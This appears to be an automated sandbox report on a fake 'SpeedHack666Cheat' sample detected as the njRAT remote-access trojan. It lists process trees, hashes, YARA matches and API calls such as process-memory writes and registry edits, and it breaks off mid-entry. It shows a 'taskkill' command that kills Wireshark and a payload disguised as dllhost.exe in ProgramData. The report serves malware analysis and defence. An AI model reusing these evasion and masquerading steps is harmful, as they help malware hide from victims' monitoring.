MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:28:33
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	12:28:33
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im Wireshark.exe
Imagebase:	0x530000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:28:50
Start date:	14/10/2024
Path:	C:\ProgramData\dllhost.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\dllhost.exe" ..
Imagebase:	0x400000
File size:	377'856 bytes
MD5 hash:	65C0F9249F64C65CDA3E5EA32126FC1F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	12:29:01
Start date:	14/10/2024
Path:	C:\ProgramData\dllhost.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\dllhost.exe" ..
Imagebase:	0x400000
File size:	377'856 bytes
MD5 hash:	65C0F9249F64C65CDA3E5EA32126FC1F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	12:29:11
Start date:	14/10/2024
Path:	C:\ProgramData\dllhost.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\dllhost.exe" ..
Imagebase:	0x400000
File size:	377'856 bytes
MD5 hash:	65C0F9249F64C65CDA3E5EA32126FC1F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	12:30:00
Start date:	14/10/2024
Path:	C:\ProgramData\dllhost.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\dllhost.exe
Imagebase:	0x400000
File size:	377'856 bytes
MD5 hash:	65C0F9249F64C65CDA3E5EA32126FC1F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	12:31:00
Start date:	14/10/2024
Path:	C:\ProgramData\dllhost.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\dllhost.exe
Imagebase:	0x400000
File size:	377'856 bytes
MD5 hash:	65C0F9249F64C65CDA3E5EA32126FC1F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	12:32:00
Start date:	14/10/2024
Path:	C:\ProgramData\dllhost.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\dllhost.exe
Imagebase:	0x400000
File size:	377'856 bytes
MD5 hash:	65C0F9249F64C65CDA3E5EA32126FC1F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	10.1%
Total number of Nodes:	69
Total number of Limit Nodes:	6

Executed Functions

Function 0097B0B3 Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0097B133

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 3043b14175b5d0477fa0b8ec52ca635a215ddb770c1e99a6ea88cc9b954c424e
Instruction ID: 02849bd8d97d70dd86d450f4a0e6ecb158faf649d2d0357ecabda2438a82d7ba
Opcode Fuzzy Hash: 3043b14175b5d0477fa0b8ec52ca635a215ddb770c1e99a6ea88cc9b954c424e
Instruction Fuzzy Hash: 1021D1765093809FDB228F25DC50B52BFF8EF06310F0885DAE9888F163D371A908CB62

Function 0097B235 Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0097B2A1

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: a30de7b1724d5bcee58ef9127183af9a774ba911f3e1a5c235caf83e812cbb43
Instruction ID: 59ada0158d509b1e5703924994fd522b4ab9118c2d24a12ceae4de1c9cfb3b36
Opcode Fuzzy Hash: a30de7b1724d5bcee58ef9127183af9a774ba911f3e1a5c235caf83e812cbb43
Instruction Fuzzy Hash: 7C118E724093809FDB228B15DC45A52FFB4EF56324F0984DAE9848B263D265A918CB62

Function 0097B0EA Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0097B133

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 0a5f8a3e11f07c36e7bf8a350ccea5ea4c1c0313ef1b010dd4b61cb09e00162b
Instruction ID: fed732ea431f8c55358128a2eb930d10896743a918922c93831ac7ef0092bb12
Opcode Fuzzy Hash: 0a5f8a3e11f07c36e7bf8a350ccea5ea4c1c0313ef1b010dd4b61cb09e00162b
Instruction Fuzzy Hash: 3111C2725042009FEB21CF55DC45B66FBE8EF04720F08C8AAED498B661D335E814DF61

Function 0097B266 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0097B2A1

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: e3088de55e95fcb4e2a495df92ab75d0a7dbd3c8821d30d4ef8a327f9fe4f6af
Instruction ID: 9510213cd985163bfd4a1bdc4ecc584e10bc90aa40c91aa380ec81214f6b748c
Opcode Fuzzy Hash: e3088de55e95fcb4e2a495df92ab75d0a7dbd3c8821d30d4ef8a327f9fe4f6af
Instruction Fuzzy Hash: 6001DB36404240DFDB21CF05D945B55FBE4FF58724F08C49ADE494B252D375A414DFA2

Function 04A510F9 Relevance: 4.0, Strings: 3, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04A517E8
:@Ul, xrefs: 04A51C81
:@Ul, xrefs: 04A5191A

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul$:@Ul
API String ID: 0-1772873017
Opcode ID: df9a1ef8b3bbfdd9e49842849b3f240a499bd0dddd5d1bcde03e22236ed345db
Instruction ID: ca14b393ff48bed53c6cf61c9968a7eb6cdd65c0679f5a6b37c09497cd80cacb
Opcode Fuzzy Hash: df9a1ef8b3bbfdd9e49842849b3f240a499bd0dddd5d1bcde03e22236ed345db
Instruction Fuzzy Hash: C8D1F774E042188FEB64EF60DD58BADB7B2BF44301F4081A9D90AAB3A4DB746D85DF41

Function 00B50080 Relevance: 2.6, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 00B50100
dS|l, xrefs: 00B501B9

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: 3a4058924c136b70f09faca050d62677915808ff0fb9b6fb218b2ab621af664c
Instruction ID: b81914c6ecb1c0ef810a2fa136ee44d83604e0a3d7569e23902c98f1edc23779
Opcode Fuzzy Hash: 3a4058924c136b70f09faca050d62677915808ff0fb9b6fb218b2ab621af664c
Instruction Fuzzy Hash: E831B1749292408BE308EB76EE52358BBE26FC9708F44C13DC1184BB28EF7456259B82

Function 00B50090 Relevance: 2.6, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 00B50100
dS|l, xrefs: 00B501B9

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: 41a07e0732548f97ee5077412f7762708b75ec5b5426722f086bb9161047b541
Instruction ID: 502f67afad34d6fc8f6a5622c404b57743c3e6d6e391a6db0bd1d934f7ff11cc
Opcode Fuzzy Hash: 41a07e0732548f97ee5077412f7762708b75ec5b5426722f086bb9161047b541
Instruction Fuzzy Hash: FE2181745196418BE308EB77EE52318FBE26FC8704F44C13DC5184B768EF7456259B92

Function 04A50A46 Relevance: 2.5, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

E, xrefs: 04A50A49
5, xrefs: 04A50A6C

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: 5$E
API String ID: 0-717204176
Opcode ID: 7aa584fcce2f6128f6485b300830016cec6e94a57f4eeec26d32a0e1ce5c3e30
Instruction ID: d665fefede2ceb036fdb907d5d47bc2ece323cef9062390eb44ed6f3c41c2d3c
Opcode Fuzzy Hash: 7aa584fcce2f6128f6485b300830016cec6e94a57f4eeec26d32a0e1ce5c3e30
Instruction Fuzzy Hash: 2DD05E7090A206CFCB419F70981959C3BF4FF11316B84424DC4019E2AACA3C4515DB01

Function 04A50140 Relevance: 2.5, Strings: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

B, xrefs: 04A50144
/, xrefs: 04A5065E

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: /$B
API String ID: 0-2775194069
Opcode ID: aaf6b73501166c03dadcc3fbfb0f4667d95f1fec3b02a9dbe5bebffb24893877
Instruction ID: 52f328c0845a38e2023e8b8403505a1f6f9220c0dc950209cdeae73b8fb207c5
Opcode Fuzzy Hash: aaf6b73501166c03dadcc3fbfb0f4667d95f1fec3b02a9dbe5bebffb24893877
Instruction Fuzzy Hash: B4D05B74A0B2459BDB415F6086583687FF5AF11300F4045E5D54AAF3E7E93C54049B12

Function 0097A793 Relevance: 1.6, APIs: 1, Instructions: 98
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0097A849

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 41f7d87e2d19cd53ef22cdfe5ce7f3d95633ecc9c9b2ffb712b8e26f8abb9f70
Instruction ID: b6768fbdcf59a5ab0b9d2663041812269aeb18f1b1a05f89938868145ce78e59
Opcode Fuzzy Hash: 41f7d87e2d19cd53ef22cdfe5ce7f3d95633ecc9c9b2ffb712b8e26f8abb9f70
Instruction Fuzzy Hash: BA3194B65053406FE722CB25CC45B66BFF8EF45314F08849AE9858B152D375A905CB72

Function 0097B62E Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0097B6D5

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: ea98b7bbf0d5bc4d6fe51dc661c0650002cdcfd77a66d69a42f240a6a128e60e
Instruction ID: d2e1763a138d2d931d530b6a594629fc41baebd21cc33130b2994a8c0fdc667e
Opcode Fuzzy Hash: ea98b7bbf0d5bc4d6fe51dc661c0650002cdcfd77a66d69a42f240a6a128e60e
Instruction Fuzzy Hash: 2631B3765093805FE711CB25CC85B66FFF8EF46310F08849AE948CB292D375A908C762

Function 0097A120 Relevance: 1.6, APIs: 1, Instructions: 86
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0097A1C2

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 2e59c70b0e536e7881cce37b63e28bbaa947a50a5c52af8aa9184868c60446ad
Instruction ID: b4d9cf4c149e6cc4283dc71f9c88517e7a108f620b3a32b9637ef2ffbf0dd54d
Opcode Fuzzy Hash: 2e59c70b0e536e7881cce37b63e28bbaa947a50a5c52af8aa9184868c60446ad
Instruction Fuzzy Hash: 6231827140D3C06FD3138B258C51BA6BFB4EF47620F0A45DBD984CF2A3D229691AC7A2

Function 0097B382 Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,458F42CF,00000000,00000000,00000000,00000000), ref: 0097B428

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: eaf214c0393b093d4709e1d6b131e20dd71caae2c5b11bfb7c83846b76c5753e
Instruction ID: 273cc17a5a28152d1586ff16ff350b2878f50013b03bf1660cb9c9ad05651331
Opcode Fuzzy Hash: eaf214c0393b093d4709e1d6b131e20dd71caae2c5b11bfb7c83846b76c5753e
Instruction Fuzzy Hash: E621A0761057805FD722CB15CC44FA6BBFCEF06210F08849AE988CB1A2D324E908C761

Function 0097A8A0 Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,00000E24,458F42CF,00000000,00000000,00000000,00000000), ref: 0097A935

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 9234c0f809f3ed5d04dafdafa56c444d07a2b944880b9dcaf76e435eb0c9e0cf
Instruction ID: b19c4e1053d7d5ff1fd567af2ae8d2132c45720259b8d8a9923af481167ee074
Opcode Fuzzy Hash: 9234c0f809f3ed5d04dafdafa56c444d07a2b944880b9dcaf76e435eb0c9e0cf
Instruction Fuzzy Hash: CB210D754097805FE7128B21DC45BB6BFBCDF47724F0980DAE9848B193D2645D09C772

Function 0097B47E Relevance: 1.6, APIs: 1, Instructions: 77
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNELBASE(?,00000E24,458F42CF,00000000,00000000,00000000,00000000), ref: 0097B514

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 12f58318511b9034e468386a98ce9ad443cd84a12fa7ff3b015868369802ea2b
Instruction ID: 78a07b03c5b9267621dbe5325e08cef4f4587ac6f3f996772fd3c4d6b001fea1
Opcode Fuzzy Hash: 12f58318511b9034e468386a98ce9ad443cd84a12fa7ff3b015868369802ea2b
Instruction Fuzzy Hash: DF2162765087806FE7228B11DC45F67BFBCEF45710F08849AE985DB2A2D364E948C771

Function 0097A7CA Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0097A849

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c8287bdf01334ec6ea20bef5b0a854e65b3052f54d52fee7b0615ab7cd23e279
Instruction ID: e6dbba05ab625f0a0a522ec33ddfcfe9f47ebbd02fc3a807a9cf19d44364b079
Opcode Fuzzy Hash: c8287bdf01334ec6ea20bef5b0a854e65b3052f54d52fee7b0615ab7cd23e279
Instruction Fuzzy Hash: 7D2195755042409FE721CF65CD45BAAFBE8EF44314F04885EEA498B251D375E905CB63

Function 0097AD1A Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNELBASE ref: 0097ADA1

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: ecda5defec021de8233708288332aeef15d030f814bd4625dce8865b503d8c82
Instruction ID: a54ad2da5a7f89534597a43da556be102f211545817898049d8c12369b02f8b4
Opcode Fuzzy Hash: ecda5defec021de8233708288332aeef15d030f814bd4625dce8865b503d8c82
Instruction Fuzzy Hash: BA215C7140E3C05FD7138B658C55695BFB4EF47220F0A84DBD985CF1A3D2296809CB72

Function 0097B662 Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0097B6D5

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 4ec484bb3598cc598c5cc1eb1fb6929ca61a5c2b7159483641f2880cfd599885
Instruction ID: 9db6c71ba6afb633431865524369e73b7087bf86a5a4b2de40098cdd007e0051
Opcode Fuzzy Hash: 4ec484bb3598cc598c5cc1eb1fb6929ca61a5c2b7159483641f2880cfd599885
Instruction Fuzzy Hash: BD2195765042409FE710DF25CD45B66F7E8EF44324F04C46AEE48CB251D775E904CA72

Function 0097AA52 Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E24,458F42CF,00000000,00000000,00000000,00000000), ref: 0097AAD1

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 72745ccf173aece6fa4722b8e36a4ef05c750ed369187e26f57d66faa7236c72
Instruction ID: 3b826500e63b1e86c3b6cdd4389ed1c009591c6fc42f25f5f795d51a98bf9dcc
Opcode Fuzzy Hash: 72745ccf173aece6fa4722b8e36a4ef05c750ed369187e26f57d66faa7236c72
Instruction Fuzzy Hash: 6A219276409380AFEB22CF51DC44F6BBFB8EF45724F08849AE9458B152D375A508CBB2

Function 0097B3AE Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,458F42CF,00000000,00000000,00000000,00000000), ref: 0097B428

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f2ff53a776f1744a38ebe9a859c3ee91f76b2011fde0636cc1a95057e611f5d0
Instruction ID: b6ebdcf7df746336ec4fac43e1cc9497a6596f79c38b190917e7c0b7bf8d6ef7
Opcode Fuzzy Hash: f2ff53a776f1744a38ebe9a859c3ee91f76b2011fde0636cc1a95057e611f5d0
Instruction Fuzzy Hash: 98218E766006049FE721CE15CC45FA6B7ECEF44724F08C45AEA49CB2A2D774E944CAB2

Function 0097A589 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0097A608

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 88a1b852fe36c54a3e5af603f1853004b3f4e0f3da7bb29e2687c6016d38f3bb
Instruction ID: 5cda74a7e6dda5e16c5d21d69a9c1ca63fe00afd34ddc0079fc58a2cafb1f783
Opcode Fuzzy Hash: 88a1b852fe36c54a3e5af603f1853004b3f4e0f3da7bb29e2687c6016d38f3bb
Instruction Fuzzy Hash: AC218E764093C09FDB128F21DC44A52FFB4EF57210F0D84DAE9848B1A3D265A949DB62

Function 0097ADE8 Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 0097AE56

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: fe7445a11ff810f053e558e0a81d7061197d21098089d278e7ad2d42b181071a
Instruction ID: 7e04650b2d4d92803704b887e03d0fb7de8edc9b8e66f89462c72d3da400b8cd
Opcode Fuzzy Hash: fe7445a11ff810f053e558e0a81d7061197d21098089d278e7ad2d42b181071a
Instruction Fuzzy Hash: C32163725093805FD711CF65DC45B56BFE8EF46620F0884AAED89CB262D225E854CB62

Function 0097B4A2 Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E24,458F42CF,00000000,00000000,00000000,00000000), ref: 0097B514

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 9791c50c2daffb17b5e7944b88d7c9d9f95739eaee762a23b2574cebc2eec28e
Instruction ID: ef918b4e722e1cc8561f7199629ed9f8a2836045c9d7d07da3dcf9f0fc1bffb9
Opcode Fuzzy Hash: 9791c50c2daffb17b5e7944b88d7c9d9f95739eaee762a23b2574cebc2eec28e
Instruction Fuzzy Hash: 081181B6504600AFEB218E15CC45B6BBBECEF04714F08C45AFE458B252D774E904CAB2

Function 0097AF4A Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0097AFB2

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: b5b3b6fa9a6fccf3642dcdd2d0d02ad14029d4536e87e26292d6f903045ac01c
Instruction ID: 1500173ff96a7d8f8d23e8de918e6b59a36b7a8010a0762353fd0966a032ae2d
Opcode Fuzzy Hash: b5b3b6fa9a6fccf3642dcdd2d0d02ad14029d4536e87e26292d6f903045ac01c
Instruction Fuzzy Hash: 441151B25053805FDB11CE15DC45B56BFE8EF55620F0884AAED49CB252E275E804CB62

Function 0097B888 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 0097B8E4

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: a743e9ec862bbd588228a8d567c083db4794967e81f38fdf7a193b5c5f88cf37
Instruction ID: 401a2f896bc4b46d1e5abe9f3499c6e946270e8126ee2e905a2cf33934ffc91b
Opcode Fuzzy Hash: a743e9ec862bbd588228a8d567c083db4794967e81f38fdf7a193b5c5f88cf37
Instruction Fuzzy Hash: D11163725093805FD712CF25DC54B56BFE8DF46224F0884EBED49CB252D265A908CB61

Function 0097AA72 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E24,458F42CF,00000000,00000000,00000000,00000000), ref: 0097AAD1

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 348a141e1adcfb3dab7ac5922166034aba426b05913fe5504011e675ddfc34de
Instruction ID: 24b45210390e77b1bccd94218f0b61a889768e4941559df439423c6eacbd2cd5
Opcode Fuzzy Hash: 348a141e1adcfb3dab7ac5922166034aba426b05913fe5504011e675ddfc34de
